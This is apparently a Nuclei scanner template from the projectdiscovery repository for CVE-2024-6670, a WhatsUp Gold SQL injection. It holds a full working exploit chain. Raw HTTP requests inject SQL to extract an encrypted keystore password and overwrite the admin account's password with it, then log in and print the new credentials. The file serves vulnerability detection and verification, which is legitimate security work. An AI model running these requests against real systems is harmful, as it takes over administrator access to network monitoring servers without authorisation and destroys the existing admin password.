nuclei-templates/http/cves/2024/CVE-2024-6670.yaml at main · projectdiscovery/nuclei-templates · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
id: CVE-2024-6670

info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
  impact: |
    Unauthenticated attackers can exploit SQL injection to retrieve encrypted user passwords, modify admin credentials, and achieve authentication bypass for full system access.
  remediation: |
    Update WhatsUp Gold to version 2024.0.0 or later to address the SQL injection vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2024-6670
    - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
    - https://www.progress.com/network-monitoring
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6670
    cwe-id: CWE-89
    epss-score: 0.94468
    epss-percentile: 0.99997
    cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
    product: whatsup_gold
    vendor: progress
  tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev,vkev,vuln

flow: |
  http(1);
  http(2);
  http(3);
  encryptedPassword = template.encryptedPassword
  const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
  const hexValues = cleanedInput.map(value => {
    const num = parseInt(value);
    return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
  });
  log(hexValues);
  const hexString = hexValues.join('');
  const varbinaryString = '0x' + hexString;
  set("encryptedPassword", varbinaryString);
  http(4) && http(5);

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
        condition: and
        internal: true

  - raw:
      - |
        GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'DisplayName')
        condition: and
        internal: true

    extractors:
      - type: regex
        internal: true
        name: encryptedPassword
        regex:
          - '"psyduck\d+(,\d+)*"'

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'false')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/User/LoginAjax HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&rememberMe=false

    matchers:
      - type: word
        part: body
        words:
          - '"authenticated":true'
          - '"username":"'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 490a00463044022066a3bf9ee136d93e329b00f874c790b4c30dde3da178d8b86858c3359e0367490220384616008a810817f1500c7e2e6b126e4f0484e7ba3cad444f038d1ffb47f91f:922c64590222798bb761d5b6d8e72950